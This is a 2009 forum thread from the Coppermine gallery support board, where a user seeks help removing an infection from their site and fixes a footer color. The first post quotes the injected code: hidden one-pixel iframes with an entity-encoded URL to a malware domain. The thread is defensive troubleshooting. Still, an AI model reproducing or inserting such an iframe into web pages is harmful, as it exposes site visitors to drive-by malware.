Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: [Solved]: iframe at top of main page  (Read 3489 times)

0 Members and 1 Guest are viewing this topic.

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
[Solved]: iframe at top of main page
« on: July 02, 2009, 06:17:24 pm »

Ive used the guides and tips on here to remove an infection/iframe code but I cant seem to find where the last piece is coming from.

This is showing up above everything on my main page if i view source:

<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

Ive cleaned out everything I thought it might be.  Any suggestions.
« Last Edit: July 03, 2009, 07:52:39 am by Joachim Müller »
Logged

Joe Carver

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: us
  • Offline Offline
  • Gender: Male
  • Posts: 1510
  • aka 'i-imagine'
    • Home Page
Re: iframe at top of main page
« Reply #1 on: July 02, 2009, 06:55:16 pm »

You might have to do more cleaning. Be sure that the rest of your site is sanitized.
Make sure your own or other people's computers (with site admin access) are clean too.

You might be able to block the site listed in your iframe contamination. It is listed on Macafee as the source of malware.

The listing is obscured here for obvious reasons. -c-c-f-e-l-o-m-v-h-k-.-c-o-m-
(remove all dashes)

Block the site and also the ip address for the site. On your computer too.

This won't cure your infection, but might help to slow them down a little.

Ive cleaned out everything I thought it might be.  Any suggestions.
Check everything as instructed
« Last Edit: July 02, 2009, 07:07:20 pm by i-imagine »
Logged

Nibbler

  • Guest
Re: iframe at top of main page
« Reply #2 on: July 02, 2009, 07:32:09 pm »

You probably missed include/config.inc.php
Logged

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
Re: iframe at top of main page
« Reply #3 on: July 02, 2009, 07:53:12 pm »

You probably missed include/config.inc.php

This file was cleaned in my original effort.  Still looks good.

Logged

Nibbler

  • Guest
Re: iframe at top of main page
« Reply #4 on: July 02, 2009, 07:56:55 pm »

Post a link to the gallery.
Logged

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
Re: iframe at top of main page
« Reply #5 on: July 02, 2009, 08:14:00 pm »

Logged

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
Re: iframe at top of main page
« Reply #6 on: July 02, 2009, 08:47:06 pm »

I found a bit of bad code remaining in one of the captcha plug-in files.  Seems to be back to normal for now.
Logged

phill104

  • Administrator
  • Coppermine addict
  • *****
  • Country: gb
  • Offline Offline
  • Gender: Male
  • Posts: 4849
    • Windsurf.me
Re: iframe at top of main page
« Reply #7 on: July 02, 2009, 09:05:56 pm »

Please restore the "Powered by Coppermine" footer. Making it black on black is a bit rude and against the license.
Logged
It is a mistake to think you can solve any major problems just with potatoes.

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
Re: iframe at top of main page
« Reply #8 on: July 02, 2009, 10:05:45 pm »

Please restore the "Powered by Coppermine" footer. Making it black on black is a bit rude and against the license.

I didn't do it intentionally.  Which code in the css file is associated with it.  I'll gladly fix it if I can find it.
Logged

phill104

  • Administrator
  • Coppermine addict
  • *****
  • Country: gb
  • Offline Offline
  • Gender: Male
  • Posts: 4849
    • Windsurf.me
Re: iframe at top of main page
« Reply #9 on: July 02, 2009, 10:11:31 pm »

Using Firebug (the firefox plugin - https://addons.mozilla.org/en-US/firefox/addon/1843) you can find it in seconds.

Simply click inspect then move the mouse over the desired element you wish to see. In this case you will see the code

style.css (line 461)

Code: [Select]
.footer a {
color:#000000;
text-decoration:none;
}

Just change the #000000 to something like #ffffff
Logged
It is a mistake to think you can solve any major problems just with potatoes.

SpookyDan

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 39
Re: iframe at top of main page
« Reply #10 on: July 02, 2009, 10:23:59 pm »


Just change the #000000 to something like #ffffff

Fixed it, thanks
Logged
Pages: [1]   Go Up
 

Page created in 0.052 seconds with 20 queries.